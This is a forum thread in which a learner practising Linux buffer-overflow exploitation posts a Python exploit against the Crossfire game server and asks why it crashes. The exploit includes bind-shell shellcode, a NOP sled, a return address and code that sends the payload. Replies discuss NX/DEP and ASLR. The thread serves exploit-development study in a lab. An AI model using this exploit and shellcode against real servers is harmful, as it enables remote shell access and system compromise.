Linux Memory Protection

This topic contains 6 replies, has 5 voices, and was last updated by  Henry864 3 years, 1 month ago.

  • Author
    Posts
  • #8506
     zaixer 
    Participant

    Hi all,

    I am practicing linux bof exploitation. when trying to exploit a vulnerability in crossfire, everything works well and I get the shellcode placed in the right place, and the program flow gets redirected to shellcode, however, when start executing the shell code, the program fails.

    OS version (bt5 R3):
    Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux

    exploit code:
    #!/usr/bin/python
    import socket, sys
    host = sys.argv[1]

    #0x8134e77 jump eax
    #0xb7dadad6 nop sled address

    shellcode= (“xccx31xdbxf7xe3x53x43x53x6ax02x89xe1xb0x66xcdx80”
    “x5bx5ex52x68xffx02x11x5cx6ax10x51x50x89xe1x6a”
    “x66x58xcdx80x89x41x04xb3x04xb0x66xcdx80x43xb0”
    “x66xcdx80x93x59x6ax3fx58xcdx80x49x79xf8x68x2f”
    “x2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1xb0”
    “x0bxcdx80”)

    crash = “x90” *199 + shellcode + “x43” * 4090 + “xd6xdaxdaxb7” + “D” * 7

    buffer= “x11(setup sound ” + crash + “x90x00#”

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print “[*]Sending evil buffer…”
    s.connect((host, 13327))
    print (s.recv(1024))

    s.send(buffer)
    s.close()
    print “[*]Payload Sent !”
    ====================================================================================================================

    I placed a break point before the shellcode and the execution flow hits it successfully, however, after continuing the program crashes and gives the following message:

    “Program received signal SIGSEGV, Segmentation fault.
    0xb7daeb36 in ?? ()”

    when inspecting this address, it’s full of zeros !

    I already disabled ASLR before starting the exercise and I am wondering does any other protection mechanism exist that prevents exploitation ?

  • #53214
     dynamik 
    Participant

    DEP? Maybe try an older Distro like Ubuntu 7.04.

    Also, have you filtered out bad characters? Does your shellcode arrive completely in tact?

  • #53215
     m0wgli 
    Participant

    @zaixer wrote:

    I already disabled ASLR before starting the exercise and I am wondering does any other protection mechanism exist that prevents exploitation ?

    Are you doing the Offensive security – Penetration Testing with BackTrack (PWB) course?

  • #53216
     zaixer 
    Participant

    I think DEP is windows based and NX is linux based…correct me please if I am wrong. the point is not to make it work only. its about understanding why it did not work :). I do not like leaving it just because it did not work 🙂

  • #53217
     testdotphp 
    Participant

    @zaixer wrote:

    I think DEP is windows based and NX is linux based…correct me please if I am wrong.

    DEP is not Windows only and is even supported by phone OSes like iOS and Android.
    Also, the “never execute bit” is part of the CPU and is supported by quite a few operating systems now. The never execute bit was a large part of the MS08-067 “thing”, as well.

  • #53218
     Henry864 
    Participant

    Is there a way to check which memory protection mechanize is used by the OS?

    I have a program that fails with segmentation fault, in one computer (ubuntu) but not in another (RH6).

    One of the explanations was memory protection mechanize used by the OS. Is there a way I can find / change it?

    Thanks,
    http://academy.ehacking.net/

  • #53219
     Henry864 
    Participant

    Until recently the exact model of how ALSR and other memory protection mechanisms work on Linux was something that I knew only at a high level. Recently I’ve done a lot of work where I’ve had the need to bypass these mechanisms (in a cooperative setting), and I want to explain for readers exactly how the memory protection model on x86/Linux systems works, what it protects against, and the ways it can be bypassed.

    There are two major mechanisms in place to protect memory access that are turned on by default on most x86-64 Linux systems. The first is the so-called NX bit which is a setting that gives finer-grained permissions to mapped memory regions. The second is address space layout randomization (ALSR) which randomizes where certain parts of a program are loaded into memory. I’ll discuss these two topics separately since they are complementary but completely orthogonal to one another.

You must be logged in to reply to this topic.

Copyright ©2019 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?